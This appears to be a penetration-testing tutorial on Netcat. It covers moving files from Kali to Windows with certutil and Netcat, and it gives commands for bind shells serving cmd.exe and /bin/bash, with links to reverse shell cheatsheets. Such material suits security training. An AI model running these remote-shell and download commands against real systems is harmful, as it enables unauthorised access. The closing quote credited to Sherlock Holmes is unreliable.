Bind & Reverse Shells

Netcat Fundamentals

• Netcat (Aka TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP.

• Netcat is available for both *NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements.

• Netcat utilizes a client-server communication architecture with two modes:

  • Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server).

  • Server mode - Netcat can be used to listen for connections from clients on a specific port.

• Netcat can be used by penetration testers to perform the following functionality:

  • Banner Grabbing

  • Port Scanning

  • Transferring Files

  • Bind/Reverse Shells </aside>

Usage of Netcat

The /usr/share/windows-binaries folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation.

Transferring Files from Kali Linux to Windows

Using Python HTTP Server and Certutil

1. Prepare Files:

   • Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux.

2. Host File on Python Server:

   • Start a Python HTTP server:

     Copy

     python3 -m http.server

   • Files can now be accessed via http://<your_ip>:8000/<filename>.

3. Download on Windows Using Certutil:

   • On the victim's Windows machine:

     Copy

     certutil -urlcache -f http://<your_ip>:8000/<filename> <file_name_to_save>

Using Netcat (nc) for Direct Transfer

1. Setup Netcat on Windows:

   • Receive files using Netcat:

     Copy

     nc.exe -nvlp 1234 > <output-file-name>

2. Send File from Kali Linux:

   • Send file from Kali Linux to Windows:

     Copy

     nc -nv <win_ip> 1234 < <file-to-share>

   • Replace <win_ip> with the Windows machine's IP address.

Bind Shells

• A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system.

• A Netcat listener can be setup to execute a specific executable like cmd.exe or /bin/bash when a client connects to the listener.

Setting Up Bind Shells

Windows System

• Establish Bind Shell:

  Copy

  nc.exe -nvlp 1234 -e cmd.exe

  This command starts a Netcat listener (-l) on port 1234 (-p 1234) and executes (-e) cmd.exe upon connection, creating a bind shell.

• Connect from Linux:

  Copy

  nc -nv <win_ip> <port>

  Replace <win_ip> with the IP address of the Windows machine hosting the bind shell, and <port> with the port number (1234 in this example).

Linux System

• Establish Bind Shell:

  Copy

  nc -nvlp 1234 -c /bin/bash

  This command sets up a Netcat listener (-l) on port 1234 (-p 1234) and executes (-c) /bin/bash upon connection, creating a bind shell.

• Connect from Windows:

  Copy

  nc.exe -nv <linux_ip> <port>

  Replace <linux_ip> with the IP address of the Linux machine hosting the bind shell, and <port> with the port number (1234 in this example).

Reverse Shells

• A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

Reverse Shell Cheatsheet

• Reverse Shell Generator

• Reverse Shell Cheatsheet - PayloadsAllTheThings

Hacker's Mantra: Humiliation is the favorite currency of the hacker. - Sherlock Holmes